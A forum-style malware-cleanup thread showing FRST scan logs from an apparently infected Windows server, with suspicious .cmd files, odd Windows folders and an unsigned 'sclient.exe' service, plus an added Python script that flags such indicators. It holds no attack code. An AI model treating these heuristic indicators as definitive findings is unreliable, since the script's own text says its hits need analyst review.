2014-02-18 19:44 - 2014-02-18 19:44 - 00001352 _____ () C:\Windows\SysWOW64\tmp22.cmd
2014-02-18 19:44 - 2014-02-18 19:44 - 00000000 ____D () C:\Windows\mtc
2014-02-18 19:41 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\pts
2014-02-18 19:38 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\ric
2014-02-18 19:38 - 2014-02-18 19:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp20.cmd
2014-02-15 14:23 - 2014-02-17 17:14 - 00000000 ____D () C:\Windows\ric_
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-07 15:04 - 2014-02-17 17:22 - 00000000 ____D () C:\Windows\mtc_
2014-02-07 14:57 - 2014-02-17 17:18 - 00000000 ____D () C:\Windows\pts_
2014-02-07 14:45 - 2014-02-15 09:21 - 00000000 ____D () C:\Windows\xpm_
2014-02-07 14:42 - 2014-02-18 02:29 - 00000000 ____D () C:\Windows\tanechka_
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 09:53 - 2014-02-19 09:36 - 00000000 ____D () C:\FRST
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:38 - 2014-01-29 09:39 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:38 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:47 - 2014-02-14 13:59 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:01 - 2014-01-29 10:47 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
2014-01-26 02:56 - 2014-02-19 09:34 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-26 02:56 - 2014-02-19 09:12 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-26 02:56 - 2014-02-11 01:07 - 00003908 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-01-26 02:56 - 2014-02-11 01:07 - 00003656 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed
2014-01-23 12:58 - 2014-01-23 12:58 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Roaming\Malwarebytes
2014-01-23 12:08 - 2014-01-29 09:31 - 00000000 ____D () C:\Program Files\ThreatExpert Memory Scanner
2014-01-23 12:08 - 2014-01-23 12:08 - 01536352 _____ (Threat Expert Ltd. ) C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
2014-01-23 12:08 - 2014-01-23 12:08 - 00000890 _____ () C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
2014-01-23 11:36 - 2014-01-29 14:08 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-01-23 11:36 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-01-23 11:20 - 2014-01-23 11:20 - 12589848 _____ (Malwarebytes Corp.) C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
2014-01-23 11:11 - 2014-01-23 11:11 - 00000000 ____D () C:\Windows\ERUNT
2014-01-23 11:10 - 2014-01-23 11:10 - 01037068 _____ (Thisisu) C:\Users\administrator.COMPANY\Desktop\JRT.exe
2014-01-23 11:08 - 2014-01-29 09:34 - 00000000 ____D () C:\AdwCleaner
2014-01-23 11:06 - 2014-01-23 11:06 - 01236282 _____ () C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
2014-01-23 11:03 - 2014-01-23 11:03 - 05173757 _____ (Swearware) C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
2014-01-23 10:43 - 2014-01-23 10:52 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\RK_Quarantine
2014-01-20 15:17 - 2014-01-19 08:33 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-01-20 15:16 - 2014-01-26 19:52 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-01-20 15:15 - 2014-01-26 19:52 - 00707672 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-20 15:13 - 2014-01-20 15:13 - 00000468 _____ () C:\Users\administrator.COMPANY\AppData\Local\Temp\chrome_installer.log
2014-01-20 15:08 - 2014-01-20 16:01 - 00000000 ____D () C:\Kaspersky Rescue Disk 10.0

==================== One Month Modified Files and Folders =======

2014-02-19 09:36 - 2014-02-19 09:36 - 00008460 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-19 09:36 - 2014-02-19 09:33 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-19 09:36 - 2014-02-05 09:53 - 00000000 ____D () C:\FRST
2014-02-19 09:35 - 2014-02-19 09:35 - 02153472 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-19 09:34 - 2014-01-26 02:56 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-02-19 09:33 - 2013-12-01 10:23 - 00000136 _____ () C:\Windows\system32\config\netlogon.ftl
2014-02-19 09:31 - 2013-11-30 11:20 - 01118029 _____ () C:\Windows\WindowsUpdate.log
2014-02-19 09:12 - 2014-01-26 02:56 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-02-18 19:58 - 2013-12-07 07:20 - 00006491 _____ () C:\Windows\SysWOW64\sclient.log
2014-02-18 19:55 - 2014-02-18 19:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp24.cmd
2014-02-18 19:55 - 2014-02-18 19:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-18 19:51 - 2014-02-18 19:51 - 00000034 _____ () C:\Windows\SysWOW64\tmp23.cmd
2014-02-18 19:44 - 2014-02-18 19:44 - 00001352 _____ () C:\Windows\SysWOW64\tmp22.cmd
2014-02-18 19:44 - 2014-02-18 19:44 - 00000000 ____D () C:\Windows\mtc
2014-02-18 19:41 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\pts
2014-02-18 19:41 - 2014-02-18 19:38 - 00000000 ____D () C:\Windows\ric
2014-02-18 19:38 - 2014-02-18 19:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp20.cmd
2014-02-18 09:43 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-02-18 09:43 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-02-18 02:29 - 2014-02-07 14:42 - 00000000 ____D () C:\Windows\tanechka_
2014-02-17 17:22 - 2014-02-07 15:04 - 00000000 ____D () C:\Windows\mtc_
2014-02-17 17:18 - 2014-02-07 14:57 - 00000000 ____D () C:\Windows\pts_
2014-02-17 17:14 - 2014-02-15 14:23 - 00000000 ____D () C:\Windows\ric_
2014-02-15 09:21 - 2014-02-07 14:45 - 00000000 ____D () C:\Windows\xpm_
2014-02-14 13:59 - 2014-01-26 19:47 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-11 01:07 - 2014-01-26 02:56 - 00003908 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-02-11 01:07 - 2014-01-26 02:56 - 00003656 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 10:07 - 2013-11-18 09:28 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\administrator.COMPANY\Desktop\TDSSKiller.exe
2014-01-29 14:08 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 10:56 - 2009-07-14 06:10 - 00694294 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-01-29 10:49 - 2013-11-30 11:29 - 25804800 _____ () C:\Windows\system32\vmguest.iso
2014-01-29 10:47 - 2014-01-26 03:01 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
2014-01-29 10:47 - 2010-11-21 04:47 - 00004430 _____ () C:\Windows\PFRO.log
2014-01-29 10:47 - 2009-07-14 06:06 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:39 - 2014-01-29 09:38 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-29 09:34 - 2014-01-23 11:08 - 00000000 ____D () C:\AdwCleaner
2014-01-29 09:31 - 2014-01-23 12:08 - 00000000 ____D () C:\Program Files\ThreatExpert Memory Scanner
2014-01-26 20:07 - 2013-12-04 19:53 - 00000000 ____D () C:\Program Files (x86)\Google
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:52 - 2014-01-20 15:16 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-01-26 19:52 - 2014-01-20 15:15 - 00707672 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:02 - 2009-07-14 04:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:56 - 2013-12-04 19:53 - 00018911 _____ () C:\Users\Administrator\AppData\Local\Temp\chrome_installer.log
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed
2014-01-23 12:58 - 2014-01-23 12:58 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Roaming\Malwarebytes
2014-01-23 12:08 - 2014-01-23 12:08 - 01536352 _____ (Threat Expert Ltd. ) C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
2014-01-23 12:08 - 2014-01-23 12:08 - 00000890 _____ () C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
2014-01-23 11:36 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-01-23 11:20 - 2014-01-23 11:20 - 12589848 _____ (Malwarebytes Corp.) C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
2014-01-23 11:11 - 2014-01-23 11:11 - 00000000 ____D () C:\Windows\ERUNT
2014-01-23 11:10 - 2014-01-23 11:10 - 01037068 _____ (Thisisu) C:\Users\administrator.COMPANY\Desktop\JRT.exe
2014-01-23 11:06 - 2014-01-23 11:06 - 01236282 _____ () C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
2014-01-23 11:03 - 2014-01-23 11:03 - 05173757 _____ (Swearware) C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
2014-01-23 10:52 - 2014-01-23 10:43 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\RK_Quarantine
2014-01-20 16:01 - 2014-01-20 15:08 - 00000000 ____D () C:\Kaspersky Rescue Disk 10.0
2014-01-20 15:13 - 2014-01-20 15:13 - 00000468 _____ () C:\Users\administrator.COMPANY\AppData\Local\Temp\chrome_installer.log
2014-01-20 13:54 - 2009-07-14 05:56 - 00020484 _____ () C:\Windows\setupact.log

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

==================== BCD ================================

Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=C:
description             Windows Boot Manager
locale                  en-US
inherit                 {globalsettings}
default                 {current}
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows Server 2008 R2
locale                  en-US
inherit                 {bootloadersettings}
recoverysequence        {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
nx                      OptOut
hypervisorlaunchtype    Auto

Windows Boot Loader
-------------------
identifier              {131b1cf3-59f3-11e3-9a9e-18a9053c1a8b}
device                  ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[C:]\Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\Winre.wim,{131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
systemroot              \windows
nx                      OptIn
winpe                   Yes

Resume from Hibernate
---------------------
identifier              {131b1cf1-59f3-11e3-9a9e-18a9053c1a8b}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No

Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=C:
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 Yes

Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200

RAM Defects
-----------
identifier              {badmemory}

Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}

Device options
--------------
identifier              {131b1cf4-59f3-11e3-9a9e-18a9053c1a8b}
description             Ramdisk Options
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\131b1cf3-59f3-11e3-9a9e-18a9053c1a8b\boot.sdi



LastRegBack: 2014-02-18 15:58

==================== End Of Log ============================


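A triage pass over an FRST log of the kind posted above, added as an example (this is not FRST's own code, and the three rules are a heuristic of my own, not a Farbar feature). It parses the Processes, Services and One Month Created Files sections and lists three things an analyst checks first: binaries whose publisher field is empty (in the log above that is the case for C:\Windows\system32\sclient.exe in both the process and the service list), .cmd files under the Windows directory, and new top-level folders under C:\Windows. SAMPLE_FRST is an excerpt of lines from the log in this thread, trimmed to a few entries per section.

```python
"""Triage of an FRST log for the indicators visible in this thread: binaries
with an empty publisher field, batch files under the Windows directory and
new top-level folders under it. Added example, not FRST's own code; the rules
are a heuristic of my own, and SAMPLE_FRST is an excerpt of lines from the
log posted above, trimmed to a few entries per section.
"""
import re
from typing import List, Tuple

SECTION_RX = re.compile(r"^=+ (.+?) =+$")
# Processes: "(Publisher) path"
PROCESS_RX = re.compile(r"^\((?P<pub>[^)]*)\) (?P<path>.+)$")
# Services:  "R2 name; path [size date] (Publisher)"
SERVICE_RX = re.compile(
    r"^(?P<state>[RS]\d) (?P<name>[^;]+); (?P<path>.+?) \[\d+ [\d-]+\] \((?P<pub>[^)]*)\)$")
# Files:     "created - modified - size attrs (Publisher) path"
FILE_RX = re.compile(
    r"^[\d-]+ [\d:]+ - [\d-]+ [\d:]+ - (?P<size>\d+) (?P<attrs>\S+) \((?P<pub>[^)]*)\) (?P<path>.+)$")
WINDIR_RX = re.compile(r"(?i)^c:\\windows\\")
SCRIPT_EXT = (".cmd", ".bat", ".vbs", ".ps1")

Finding = Tuple[str, str]  # (rule name, path)


def triage_frst(text: str) -> List[Finding]:
    """Return (rule, path) pairs in log order; an empty list means no hits."""
    findings: List[Finding] = []
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RX.match(line)
        if m:                       # "==== Processes (Whitelisted) ====" etc.
            section = m.group(1)
            continue
        if section.startswith("Processes"):
            m = PROCESS_RX.match(line)
            if m and not m.group("pub").strip():
                findings.append(("process_no_publisher", m.group("path")))
        elif section.startswith("Services"):
            m = SERVICE_RX.match(line)
            if m and not m.group("pub").strip():
                findings.append(("service_no_publisher", m.group("path")))
        elif section.startswith("One Month Created"):
            m = FILE_RX.match(line)
            if not m:
                continue
            path, attrs = m.group("path"), m.group("attrs")
            if not WINDIR_RX.match(path):
                continue
            if path.lower().endswith(SCRIPT_EXT):
                findings.append(("script_in_windir", path))
            elif "D" in attrs and path.count("\\") == 2:
                # a directory created directly under C:\Windows (one level deep)
                findings.append(("new_windir_subdir", path))
    return findings


# Excerpt of the FRST.txt posted in this thread, a few lines per section.
SAMPLE_FRST = r"""
==================== Processes (Whitelisted) =================

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
() C:\Windows\system32\sclient.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe

==================== Services (Whitelisted) =================

R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [12784 2010-11-11] (Microsoft Corporation)
R2 sclient; C:\Windows\system32\sclient.exe [192512 2013-12-07] ()

==================== One Month Created Files and Folders ========

2014-02-18 19:55 - 2014-02-18 19:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp24.cmd
2014-02-18 19:55 - 2014-02-18 19:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-18 19:41 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\pts
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-23 11:11 - 2014-01-23 11:11 - 00000000 ____D () C:\Windows\ERUNT

==================== End Of Log ============================
"""


if __name__ == "__main__":
    for rule, path in triage_frst(SAMPLE_FRST):
        print(f"{rule:22s} {path}")
```

The output is a candidate list, not a verdict: C:\Windows\ERUNT shows up in the same list as the malware folders because it was created a minute after JRT.exe landed on the desktop, so each hit still needs the analyst to match it against what they themselves installed. The value is that a four-hundred-line FRST log collapses to half a dozen lines, with the unsigned service binary at the top.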
Additional Log:

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 18-02-2014
Ran by Administrator at 2014-02-19 09:36:40
Running from C:\Users\administrator.COMPANY\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================


==================== Installed Programs ======================

7-Zip 9.20 (x32 Version: 9.20.00.0 - Igor Pavlov)
Active Directory Management Pack Helper Object (Version: 1.1.0 - Microsoft Corporation)
ATI Display Driver (Version: 8.24.50.5-090623a-083726C-HP - )
Google Chrome (x32 Version: 32.0.1700.107 - Google Inc.)
Google Update Helper (x32 Version: 1.3.22.5 - Google Inc.) Hidden
Headless Server Registry Update (x32 Version: 1.0.0.0 - Hewlett-Packard Company)
HP Array Configuration Utility (x32 Version: 8.50.5.0 - Hewlett Packard Development Company, L.P.)
HP Array Configuration Utility CLI (x32 Version: 8.50.6.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Diagnostics  Online Edition for Windows (Version: 8.5.0 - Hewlett-Packard Development Company, L.P.)
HP Insight Management Agents (Version: 8.50.0.0 - Hewlett-Packard Company)
HP Lights-Out Online Configuration Utility (Version: 3.1.0.0 - Hewlett-Packard Development Company, L.P.)
HP ProLiant Integrated Management Log Viewer (Version: 5.24.0.0 - Hewlett-Packard Company)
HP ProLiant PCI-express Power Management Update for Windows (x32 Version: 1.3.0.0 - Hewlett-Packard Company)
HP ProLiant Remote Monitor Service (Version: 5.21.0.0 - Hewlett-Packard Company)
HP Smart Array SAS/SATA Event Notification Service (Version: 6.20.0.64 - Hewlett-Packard Development Company, L.P.)
HP System Management Homepage (x32 Version: 6.1.0 - Hewlett-Packard Company)
HP Version Control Agent (x32 Version: 6.1.0.842 - Hewlett Packard Development Company, L.P.)
Malwarebytes Anti-Malware version 1.75.0.1300 (x32 Version: 1.75.0.1300 - Malwarebytes Corporation)
Microsoft Antimalware (Version: 3.0.8107.0 - Microsoft Corporation) Hidden
Microsoft Forefront Endpoint Protection 2010 (Version: 2.0.657.0 - Microsoft Corporation)
Microsoft Forefront Endpoint Protection 2010 Server Management (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (Version: 8.0.59192 - Microsoft Corporation)
PFA Server Registry Update (x32 Version: 1.0.0.0 - Hewlett-Packard Company)
System Center 2012 - Operations Manager Gateway (Version: 7.0.9538.0 - Microsoft Corporation)
ThreatExpert Memory Scanner 1.0 (Version: 1.0.1.0 - Threat Expert Ltd.)

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.


==================== Hosts content: ==========================

2009-07-14 03:34 - 2013-12-03 19:46 - 00000862 ____A C:\Windows\system32\Drivers\etc\hosts
188.122.70.10         scom01.asapnet.local

==================== Scheduled Tasks (whitelisted) =============

Task: {3B2389C6-7580-402B-8965-1F13A16077D7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-26] (Google Inc.)
Task: {63EE8552-A444-4BA2-8E1E-C8350D6D412A} - System32\Tasks\Microsoft\Windows\Server Manager\ServerManager => C:\Windows\system32\ServerManagerLauncher.exe [2009-07-14] (Microsoft Corporation)
Task: {69110D7B-41DC-4E9D-BDD3-C826C7DB613B} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleUsageCollector => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)
Task: {7141E73B-D3DA-4BF7-B79B-B443DC38A0B9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-26] (Google Inc.)
Task: {815E046D-8DB5-440B-84D3-FDCA723411E6} - System32\Tasks\Microsoft\Windows\Backup\Microsoft-Windows-WindowsBackup => C:\Windows\System32\wbadmin.exe [2009-07-14] (Microsoft Corporation)
Task: {AFECE848-8DA2-461B-B5E6-CBEF57A4DF7D} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleCollector => C:\Windows\system32\ceiprole.exe [2010-11-21] (Microsoft Corporation)
Task: {D49A10DA-0F70-4779-BD96-B2D976A4F2E3} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerCeipAssistant => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2009-06-25 15:54 - 2009-06-25 15:54 - 00027136 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\XalanMessages_1_10.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 00255488 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\SSLEAY32.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 01362944 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\LIBEAY32.dll
2013-12-07 07:20 - 2013-12-07 07:20 - 00192512 _____ () C:\Windows\system32\sclient.exe
2010-04-28 16:37 - 2010-04-28 16:37 - 00048128 _____ () C:\Windows\system32\CpqNiMgt\CPQNIMIB.DLL
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\cpqnimgt\w2kmgdll.dll
2010-04-28 16:33 - 2010-04-28 16:33 - 00018432 _____ () C:\Windows\system32\cpqnimgt\cqnisnmp.dll
2010-04-28 16:37 - 2010-04-28 16:37 - 00025088 _____ () C:\Windows\system32\CpqNiMgt\NICMIB.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00193024 _____ () C:\Windows\system32\CpqMgmt\Cqmgstor\stormib.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\cqstrutl.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00007168 _____ () C:\Windows\system32\cpqmgmt\cqmgstor\storsnmp.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00027648 _____ () C:\Windows\system32\CpqMgmt\CqmgStor\iscsimib.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\bin\libxml2.dll
2013-11-30 11:20 - 2009-03-09 18:08 - 00072704 _____ () C:\hp\hpsmh\bin\zlib1.dll
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\CPQNiMgt\w2kmgdll.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00032768 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CQMGSTOR.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00043008 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQIDE.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00041472 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMDISK.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00057856 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMSCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00091136 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMIDA.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00115200 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQFCA.DLL
